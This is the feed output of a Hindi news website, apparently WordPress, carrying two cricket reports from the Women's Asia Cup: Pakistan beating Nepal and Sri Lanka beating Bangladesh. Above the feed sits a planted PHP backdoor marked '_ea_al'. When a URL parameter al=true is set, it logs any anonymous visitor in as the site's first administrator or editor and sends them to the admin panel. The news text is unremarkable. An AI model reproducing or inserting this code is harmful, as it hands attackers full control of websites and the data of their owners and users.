// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Women’s Asia Cup – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 22 Jul 2024 15:00:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 महिला एशिया कप: पाकिस्तान ने नेपाल को 9 विकेट से हराया https://pratyushaashakinayikiran.com/?p=53658 Mon, 22 Jul 2024 15:00:00 +0000 https://pratyushaashakinayikiran.com/?p=53658 दाम्बुला

सलामी बल्लेबाज गुल फिरोजा के शानदार अर्धशतक और मुनीबा अली के साथ उनकी शतकीय साझेदारी की मदद से पाकिस्तान ने रविवार को यहां नेपाल को 49 गेंद शेष रहते हुए 9 विकेट से हराकर महिला एशिया कप टी20 क्रिकेट टूर्नामेंट के सेमीफाइनल में पहुंचने की अपनी उम्मीदों को बरकरार रखा।

नेपाल की टीम पहले बल्लेबाजी का न्योता मिलने पर निर्धारित 20 ओवर में छह विकेट पर 108 रन ही बना पाई। पाकिस्तान ने 11.5 ओवर में एक विकेट पर 110 रन बनाकर आसान जीत दर्ज की।

फिरोजा ने 35 गेंद पर 10 चौकों की मदद से 57 रन बनाए जबकि मुनीबा ने 34 गेंद पर नाबाद 46 रन बनाए, जिसमें आठ चौके शामिल हैं। इन दोनों ने पहले विकेट के लिए 105 रन की साझेदारी की।

पाकिस्तान की टीम पहले मैच में भारत से हार गई थी जबकि नेपाल ने संयुक्त अरब अमीरात को हराया था। पाकिस्तान ने इस मैच में बड़ी जीत से अपने नेट रन रेट में सुधार किया। उसके और नेपाल दोनों के समान दो-दो अंक हैं। पाकिस्तान को ग्रुप ए का अपना अंतिम मैच संयुक्त अरब अमीरात जबकि नेपाल को भारत से खेलना है।

पाकिस्तान के गेंदबाजों ने बाएं हाथ की स्पिनर सादिया इकबाल की अगुवाई में कसी गेंदबाजी करके नेपाल को कम स्कोर पर रोक दिया। सादिया ने 19 रन देकर दो विकेट लिए।

नेपाल की तरफ से कविता जोशी ने सर्वाधिक 31 रन बनाए। सीता राणा मगर ने 26 रन का योगदान दिया। नेपाल के तीन बल्लेबाज रन आउट हुए।

 

]]>
महिला एशिया कप: श्रीलंका ने बंगलादेश को सात विकेट से हराया https://pratyushaashakinayikiran.com/?p=53416 Sun, 21 Jul 2024 18:40:00 +0000 https://pratyushaashakinayikiran.com/?p=53416 दांबुला
गेंदबाजों के शानदार प्रदर्शन के बाद विश्मी गुणारत्ने (51) और हर्षिता समाराविक्रमा (33) रनों की बेहतरीन पारियों के दम पर श्रीलंका ने महिला एशिया कप के चौथे मुकाबले में 17 गेंदे शेष रहते बंगलादेश को सात विकेट से हरा दिया है।
आज यहां बंगलादेश की महिला टीम ने टॉस जीत कर पहले बल्लेबाजी करने का फैसला किया। बल्लेबाजी करने उतरी बंगलादेश की शुरुआत बेहद खराब रही और उसने एक समय 1.3 ओवर में 17 के स्कोर पर अपने चार विकेट गवां दिये थे। दिलारा अख्तर (6), इश्मा तंजीम (शून्य), रुब्या हैदर (शून्य), ऋतु मोनी (3) रन बनाकर आउट हुई। इसके बाद कप्तान निगार सुल्ताना ने शोरिफा खातून के साथ पारी को संभालने का प्रयास किया। पांचवें विकेट रूप में शोरिफा खातून (5) रन बनाकर आउट हुई। छठां विकेट राबेया खान (10) गिरा। शोरना अख्तर ने शानदार बल्लेबाजी का मुजाहिरा करते हुए 14 गेंदों में 25 रन बनाये। निगार सुल्ताना ने छह चौकों की मदद से नाबाद 48 रनों की पारी खेली। बंगलादेश की टीम निर्धारित 20 ओवर में आठ विकेट पर 111 रन ही बना सकी।
श्रीलंका की ओर से उदेशिका प्रबोधनी और इनोशी प्रियदर्शिनी ने दो-दो विकेट लिये। सुगंधिका कुमारी, कविशा दिलहारी और चमारी अट्टापटू ने एक-एक बल्लेबाज को आउट किया।
112 रनों के लक्ष्य का पीछा करने उतरी विश्मी गुणारत्ने और कप्तान चमारी अट्टापटू ने पारी की अच्छी शुरुआत करने का प्रयास किया। दोनों बल्लेबाजों ने पहले विकेट लिये 32 रन जोड़े। छठें ओवर में चमारी अट्टापटू (12) रन बनाकर आउट हुई। उसके बाद विश्मी गुणारत्ने और हर्षिता समाराविक्रमा ने बेहतरीन बल्लेबाजी का मुजाहिरा करते हुए दूसरे विकेट के लिये 54 रनों की साझेदारी की। दूसरे विकेट के रूप में विश्मी गुणारत्ने 48 गेंदों में 51 रन बनाकर आउट हुई।हर्षिता समाराविक्रमा ने 31 गेंदों में 33 रनों की पारी खेली। कविशा दिलहारी 12 रन बनाकर नाबाद रही। श्रीलंका की टीम ने 17.1 ओवर मे तीन विकेट पर 114 रन बनाकर सात विकेट से मुकाबला जीत लिया। बंगलादेश की ओर से नाहिदा अख्तर ने 12 रन देकर तीन विकेट लिये।

 

]]>